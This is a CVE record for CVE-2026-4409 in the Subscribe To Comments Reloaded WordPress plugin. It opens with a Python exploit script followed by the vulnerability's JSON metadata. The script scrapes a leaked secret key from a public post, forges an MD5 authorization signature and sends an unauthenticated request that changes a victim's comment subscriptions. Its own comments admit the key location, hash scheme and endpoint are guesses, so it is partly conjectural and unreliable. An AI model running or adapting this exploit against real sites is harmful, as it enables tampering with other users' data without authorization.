CVE-2026-4409

import requests import re # Exploit Title: Subscribe To Comments Reloaded < 240119 - Key Leak & Subscription Management # Date: 2026-05-05 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/plugins/subscribe-to-comments-reloaded/ # Version: <= 240119 # Configuration target_url = "http://target-wordpress-site.com/sample-post" victim_email = "[email protected]" action = "unsubscribe" # or other management actions def exploit(): session = requests.Session() print(f"[+] Targeting: {target_url}") # Step 1: Extract the leaked secret key from the public page # Note: The specific location of the key might vary, this is a simulation based on the description response = session.get(target_url) # Assuming the key is exposed in a JS variable or hidden input named 'stcr_key' or similar # Regex to find a potential key (hex string or specific length) match = re.search(r"var\s+stcr_secret_key\s*=\s*['\"]([^'\"]+)['\"]", response.text) if not match: print("[-] Failed to extract secret key. The site might be patched or key location changed.") return secret_key = match.group(1) print(f"[+] Secret Key found: {secret_key}") # Step 2: Forge the authorization token # The plugin likely uses a simple hash like md5(key + email) # This is a conceptual representation of the weak hash generation import hashlib payload = f"{secret_key}{victim_email}{action}" forged_signature = hashlib.md5(payload.encode()).hexdigest() print(f"[+] Forged Signature: {forged_signature}") # Step 3: Send the malicious request to manage subscriptions # Endpoint might be /wp-admin/admin-ajax.php or a specific link defined by the plugin manage_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" data = { "action": "stcr_manage_subscription", "email": victim_email, "sck": forged_signature, # Subscription Check Key "post_id": "1", "do": action } exploit_response = session.post(manage_url, data=data) if exploit_response.status_code == 200: print(f"[+] Request sent successfully. Check if subscription for {victim_email} was modified.") else: print(f"[-] Request failed with status code: {exploit_response.status_code}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-4409", "sourceIdentifier": "[email protected]", "published": "2026-05-05T03:15:59.420", "lastModified": "2026-05-05T19:09:32.000", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve", "source": "[email protected]"}]}}